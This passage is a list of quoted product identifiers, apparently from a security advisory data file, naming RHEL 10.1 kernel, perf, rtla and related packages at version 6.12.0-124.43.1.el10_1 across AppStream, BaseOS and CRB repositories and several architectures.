"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
